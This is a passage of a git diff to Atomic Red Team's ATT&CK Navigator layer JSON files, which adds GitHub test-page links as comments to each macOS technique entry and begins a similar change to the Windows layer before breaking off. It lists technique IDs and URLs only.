--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 9934245a..0d988691 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"